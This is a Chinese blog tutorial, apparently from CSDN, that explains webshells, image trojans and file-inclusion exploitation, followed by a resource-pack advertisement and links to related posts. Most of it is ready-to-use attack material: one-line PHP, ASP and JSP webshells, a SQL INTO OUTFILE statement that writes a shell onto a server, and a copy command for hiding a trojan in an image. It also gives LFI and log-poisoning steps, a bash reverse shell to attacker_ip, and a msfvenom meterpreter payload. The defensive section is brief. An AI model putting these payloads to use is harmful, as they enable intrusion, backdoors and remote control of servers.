渗透测试实战:图片马与文件包含漏洞利用详解,一句话告诉你木马\大马\小马\Webshell与Shell区别

于 2025-04-17 11:51:51 发布
阅读量1.1k 收藏 23
点赞数 22
文章标签: web安全 计算机 网络安全 黑客技术 渗透测试 文件包含漏洞 木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/cxyxx12/article/details/147300627
版权

文章目录

1. Webshell的利用

1.1 Webshell的定义与原理
  • Webshell是一种以ASP、PHP、JSP或CGI等网页文件形式存在的命令执行环境,通常被称为“网页后门”。
  • 黑客通过入侵网站后,将Webshell文件混入服务器的WEB目录(如/var/www/html),然后通过浏览器访问这些恶意脚本,获取命令执行权限,从而控制服务器。
  • Webshell的功能包括但不限于文件上传/下载、数据库操作、远程命令执行(RCE)以及权限提升。

原理: Webshell的植入通常利用网站漏洞,例如:

  • 文件上传漏洞:绕过上传过滤,直接上传恶意脚本。

  • SQL注入漏洞:通过注入写入文件到服务器目录。

  • RCE漏洞:利用代码执行漏洞运行恶意命令。

1.2 Webshell的分类与实战利用
分类

  1. 大马

    • 特点:体积大、功能全面,支持文件管理、数据库操作、权限提升等。

    • 实战示例:利用CMS(如WordPress)的文件上传漏洞上传c99shell.php,通过浏览器访问后可直接管理服务器。

    • 代码示例(PHP大马):

      <?php
if(isset($_POST['cmd'])) {
    system($_POST['cmd']);
}
?>

  2. 小马

    • 特点:轻量级,功能单一,通常用于初步渗透或作为“大马”的跳板。

    • 实战示例:上传一个仅几十字节的小马,通过其上传大马。例如:

      <?php @eval($\_POST\['key'\]); ?>

    • 技巧:小马常用于绕过WAF(Web应用防火墙)检测,因其代码短小隐蔽性强。

  3. 一句话木马

    • 特点:代码极简(如一行),隐蔽性高,常配合客户端工具(如中国菜刀、蚁剑)管理。

    • 常见代码

      PHP:<?php @eval($_POST['value']); ?>

ASP:<%eval request("value")%>

JSP:<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

    • 实战利用:通过SQL注入将一句话木马写入服务器文件,然后用工具连接管理。

利用限制条件

  • 需知道网站文件物理路径(如/etc/apache2/html)。

  • 目标目录需具有写权限。

  • 对于数据库操作,需具备MySQL root权限,且secure_file_priv配置为空(否则无法写入文件)。

实战技术手法

  1. 利用文件上传漏洞

    • 工具:Burp Suite抓包修改上传请求,将.php伪装为.jpg

    • 步骤:上传<?php eval($_POST['cmd']); ?>,访问URL执行命令。

  2. SQL注入写入Webshell

    • SQL语句示例:

      SELECT '<?php eval($_POST["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

    • 前提:数据库用户有文件操作权限。

  3. RCE直接执行

    • 示例:利用PHP的system()函数执行whoami,确认权限。
1.3 Webshell与Shell的区别

  • Webshell:基于Web服务器的持久化后门,通过HTTP请求持续控制。

  • Shell:通常指通过漏洞(如缓冲区溢出)获得的系统命令行环境,如反弹Shell或GetShell。

    • GetShell:获取目标系统Shell的过程,可能通过漏洞直接反弹(如bash -i >& /dev/tcp/attacker_ip/4444 0>&1)。

    • 反弹Shell:不具备持久性,断线后需重新获取。

关键差异:Webshell依赖Web服务,隐蔽性更强;Shell依赖系统漏洞,控制更直接但持久性较弱。

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

2. 图片马的利用方式

2.1 图片马的定义与生成
  • 图片马是一种将恶意代码(如一句话木马)隐藏在图片文件中的特殊Webshell。
  • 它通过文件拼接技术生成,外观为正常图片,但可被特定漏洞利用执行代码。

生成步骤

  1. 准备文件:

    • 一张图片(如001.jpg)。

    • 一句话木马(如test.php<?php eval($_POST['yuer']); ?>)。

  2. 使用DOS命令拼接:

    copy 001.jpg/b + test.php/a 2.jpg

    • /b:以二进制模式读取图片。

    • /a:以文本模式读取PHP代码。

  1. 输出结果:生成新文件2.jpg,表面是图片,实际包含可执行代码。

2.2 图片马的实战利用技术

利用前提:需要配合文件包含漏洞(File Inclusion Vulnerability)。

文件包含漏洞简介

文件包含漏洞分为本地文件包含(LFI)和远程文件包含(RFI),常见于PHP等语言。例如:

<?php
$file = $_GET['file'];
include($file);
?>

攻击者可通过参数控制加载恶意文件。

利用步骤

  1. 上传图片马

    • 2.jpg上传至服务器(如/upload/2.jpg)。

  2. 触发文件包含

    • 构造URL:http://127.0.0.1/include.php?file=upload/2.jpg

    • 服务器解析2.jpg时执行隐藏的PHP代码。

  3. 连接管理

    • 使用Webshell客户端(如蚁剑)输入密码yuer,连接并执行命令。
高级技巧

  • 绕过过滤:将图片马命名为test.jpg.php,利用服务器解析规则执行。

  • 伪协议利用:结合php://filter读取文件内容:

    http://127.0.0.1/include.php?file=php://filter/convert.base64-encode/resource=upload/2.jpg

  • 日志投毒:将恶意代码写入服务器日志(如Apache的access.log),再通过LFI包含执行。

与Webshell的区别

  • Webshell可直接通过URL访问执行,图片马需文件包含漏洞触发。

  • 图片马隐蔽性更强,绕过基于语言特征的检测。

3. 木马病毒的破坏与控制手段

3.1 木马病毒的直接破坏方式

  • 磁盘数据破坏:改写或删除关键文件,导致系统崩溃。

  • 数据库破坏:篡改或泄露数据库内容,造成数据丢失。

  • 资源占用:消耗CPU和内存,影响正常运行。

3.2 木马病毒的控制手段

  • 远程控制:通过C2服务器(如nc -lvp 4444)接收指令。

  • 键盘记录:捕获用户输入,窃取凭据。

  • 数据窃取:打包敏感文件上传至攻击者服务器。

3.3 免杀与后门技术

  • 免杀

    • 编码混淆:使用Base64或Hex编码隐藏恶意代码。

    • 分离加载:将代码分段存储,运行时动态拼接。

    • 工具:使用msfvenom生成免杀Payload:

      msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f raw > shell.php

  • 后门

    • 计划任务:添加定时任务反弹Shell。

    • 服务驻留:伪装为系统服务启动。

4. 防范与防御措施

  1. 代码审计

    • 检查文件上传功能,限制文件类型和大小。

    • 禁用危险函数(如eval()system())。

  2. 权限管理

    • Web目录仅赋予最小权限,禁止写操作。

    • 数据库用户禁用文件操作权限。

  3. 安全配置

    • 设置secure_file_priv=/tmp/,限制MySQL文件写入。

    • 配置WAF拦截恶意请求。

  4. 检测与响应

    • 部署IDS/IPS监控异常流量。

    • 定期扫描服务器文件,检查可疑脚本。

5. 总结

  • Webshell vs 图片马:Webshell依赖直接访问,功能全面;图片马需文件包含漏洞触发,隐蔽性更强。

  • 实战价值:通过漏洞利用、工具配合(如Burp Suite、蚁剑),攻击者可实现从渗透到控制的全流程。

  • 防御重点:加强输入验证、权限控制和实时监控,能有效降低木马入侵风险。

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述
在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
在这里插入图片描述
在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:
在这里插入图片描述
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

图片利用的三种方式
weixin_48435065的博客
09-30 3642
user.ini实际上就是个可以由用户“自定义”的php.ini,我们可以自定义除了PHP_INI_SYSTEM以外的模式,在执行php代码之前,系统会对.user.ini先做个执行,然后才执行其他的php文件。满足.user.ini、1.jpg1.php(任意php文件)这三个文件在同目录下,则相当于在1.php文件里插入了包含语句require('1.png'),进行了文件包含。首先上传图片利用文件包含上传的图片,使得php文件执行,然后使用菜刀连接。// 1.php(任意php文件)
webshell木马详解
金色%夕阳的博客
04-24 6118
webshell简介 什么是webshell句话木马是什么样的 <?php @eval($_POST[cmd]);?> 怎么对木马进行免杀(绕过) 异或变形,关键字拼接,加密,编码等方式 文件上传 文件上传有哪些可以利用的点 前端校验 js 禁用js 或者 burp抓包后改名将.jpg改为.php 后端校验MIME类型。 更改Content-Type为Content-Type: image/jpeg 文件后缀黑名单 寻找其他可解析后缀 利用.user.ini .htaccess 利用%
Webshell句话木马
谢公子的博客
11-28 2万+
目录 Webshell(大马) 句话木马(小马) 句话木马原理 句话木马的变形 JSP后门脚本 Webshell(大马) 我们经常会看到Webshell,那么,到底什么是Webshell呢? webshell就是以 asp、aspx、php、jsp 或者cgi等网页文件形式存在的种命令执行环境,也可以将其称做为种网页后门。黑客在入侵了个网站后,通常会将asp、aspx...
说说 WEB SHELL
weixin_33877092的博客
01-06 172
WEB SHELL 的威力危害性有多大,大家都知道,我就不多说了。下面首先给出WEB SHELL 的例子,然后,逐步分析我们应该怎样来防范 WEB SHELL. WEB SHELL 例子 本文提供该 WEB SHELL,是因为下文的分析会用到它。请读者不要误用,感谢。 二. WEB SHELL 的防护 WEB SHELL 的防护,说到底,...
web shell
heizistudio的专栏
09-02 704
[root@duxiu_myslq weba]# vim blog/views.py from django.http import HttpResponse from django.shortcuts import render_to_response import os import datetime def testform(request):    return render_
2024年网络安全最新网络安全-webshell详解(原理、攻击、检测防御)
最新发布
2401_84240129的博客
05-02 1280
Webshell是通过服务器开放的端口获取服务器的某些权限。webshell又称脚本木马般分为大马小马句话木马大马,体积大、功能齐全、能够管理数据库、文件管理、对站点进行快速的信息收集,甚至能够提权。小马般而言,我们在上传文件的时候,会被限制上传的文件大小或是拦截的情况,那么我通过小马来上传大马,实现我们想要的功能。句话木马,短小精悍、功能强大、隐蔽性好、使用客户端可以快速管理webshell
网络安全攻防——webshell攻击&文件操作漏洞
优快云
05-14 2621
文章目录1、文件加载导入load_file ()读取服务器中的文件into outfile()向服务器导入本地文件2、句话木马(小马)+大马+webshell2.1 句话木马2.2 大马2.3 webshell软件2.4 附:常见命令3、文件上传漏洞4、文件包含漏洞5、文件下载漏洞6、CSRF漏洞7、总结: 1、文件加载导入 数据库中需要开启权限,在my.ini文件的mysqld中添加语句:secure_file_priv= 表示可以导入导出到任何位置。在数据中查看权限SHOW GLOBAL VAR
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3569
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
渗透测试行业 网络安全 黑客术语
03-02
### 渗透测试行业核心知识点详解 #### 、基础概念 **1. 渗透测试**:种模拟真实攻击的测试方法,旨在评估系统的安全性。通过模拟黑客的行为技术,发现并报告潜在的安全漏洞。 **2. 网络安全**:指确保网络...
太厉害了,终于有人能把文件上传漏洞讲的明明白白了
m0_67403272的博客
07-30 415
大部分站点都具有文件上传功能,例如头像更改,文章编辑,附件上传等等。文件上传漏洞是指文件上传功能没有对上传的文件做合理严谨的过滤,导致用户可以利用此功能,上传能被服务端解析执行的文件,并通过此文件获得执行服务端命令的能力。...
web-shells:用于渗透测试Web shell
06-21
网壳 这是组非常简单的 web shell。 大多数是我写的,有些是其他作者写的(在来源中命名)。 我不建议在实时环境中使用这些,除非您知道自己在做什么。 其中大多数没有身份验证或限制,旨在在最短的时间内完成简单的工作,主要用于虚拟实验室考试。 为了更深入地思考适用于更广泛平台的web shell,我推荐 Laudanum: ://laudanum.inguardians.com/ cmdshell.txt 非常简单的 PHP 命令外壳。 执行 $_GET["cmd"] 中的任何内容并将结果输出到页面。 使用它,您可能可以完成 90% 的工作。 mysqlshell.txt 使用 ext/mysql 函数的简单 MySQL shell,用于 PHP<5.5。 提供凭据 SQL 命令,它将在表中输出结果集 pdoshell.txt mysqlshell.txt 相
webshell
qq_58970968的博客
03-31 3211
什么是webshell? webshell就是以asp、aspx、 php.jsp, 或者cgi等网页文件形式存在的种命令执行环境,也可以将其称做为种网页后门。黑客在入侵了个网站后,可以使用浏览器或者webshell管理工具来访问该后门文件,执行相关的系统命令,以达到控制网站服务器的目的。 getshell总结博客:https://note.youdao.com/ynoteshare1/index.html?id=b58d8f4a93c3e5cb0f40ffa5243c11e6&t.
web_shell
里丘~班诺的小屋
05-08 298
webshell 小马:句话木马也称为小马,即整个shell代码量只有行,般是系统执行函数 大马: 代码量功能比小马多,般会进行二次编码加密,防止被安全防火墙/入侵系统检测到 shell2.php #eval 使用php函数,例如phpinfo(); <?php eval($_REQUEST['pass']);?> http://192.168.238.131/dvwa/hackable/uploads/shell2.php?pass=phpinfo(); shel
关于图片的正确用法
热门推荐
qq_42311391的博客
04-23 4万+
图片,有木马,然而菜刀连接不上,你绝望吗?不怕今天我会教大家的。 我们先看下源码吧,过关方式也是叫我们上传图片。。。 然后我还要说吗下,图片不是木马图片个菜刀就可以了的。还需要漏洞,叫做文件包含漏洞。。。这个漏洞原理呢 :准备图片 需要用到DOS指令 Bash copy 001.jpeg/b + test.php/a 2.jpg 这个...
文件上传-图片webshell上传
qq_25899635的博客
05-21 4797
图片webshell制作 在服务器端的PHP代码中,对于用户上传的文件做文件类型检查,查看文件格式是否符合上传规范。可以检查文件二进制格式的前几个字节,从而判断文件类型是否正确。 针对这种情况可以直接新建要给1.jpg,其中代码内容如下: GIF98A <?php phpinfo(); ?> 上传图片webshell文件 将制作好的图片webshell上传到服务器。 其中可能Cont...
SSH Web (webshell)
用法之妙,存乎一心。
11-19 1805
SSH Web Gateway mit dem OpenSource Tool shellinabox
Webshell介绍
YIGAOYU的博客
10-07 2830
目录. Webshell介绍1.1任务描述1.2 训练目标1.3 Webshell简介1.4 常见Webshell上传方式1.4.1 解析漏洞上传(1)IIS目录解析漏洞(2)文件解析漏洞(3)文件名解析(4)fast-CGI解析漏洞(5)Apache解析漏洞1.4.2 截断上传1.4.3 后台数据库备份1.4.4 利用数据库语句上传(1)MySQL数据库into outfile(2)建立新表写入木马(3)phpMyadmin设置错误1.5 Webshell的作用1.6 Webshel
webshell gif图片文件绕过
墨痕诉清风的博客
04-26 1210
现在需要将请求发送到repeater,以便编辑它并注入PHP反向shell。在下面的请求中,确保文件名以“.php”结尾,并且原始请求的第行被保留,因为这些是用于识别正在上传的文件类型的魔术字节。然后在magic byte sequence下面我们可以注入PHP Reverse shell。目录页/dev/index. php允许GIF上传。尝试上传不同的文件类型将被拒绝。上传文件并使用Burpsuite捕获请求。这可以通过首先上传合法的GIF文件来绕过。完成后,发送请求并检查是否上传。
全方位渗透测试工具集:webshell、代码审计漏洞分析
本合集致力于收集整合市面上最常用的渗透测试工具,覆盖了从webshell管理、漏洞分析利用到代码审计等多个方面。 webshell是指运行在服务器上的Web应用程序的后门程序,它通常允许攻击者远程控制被感染的服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值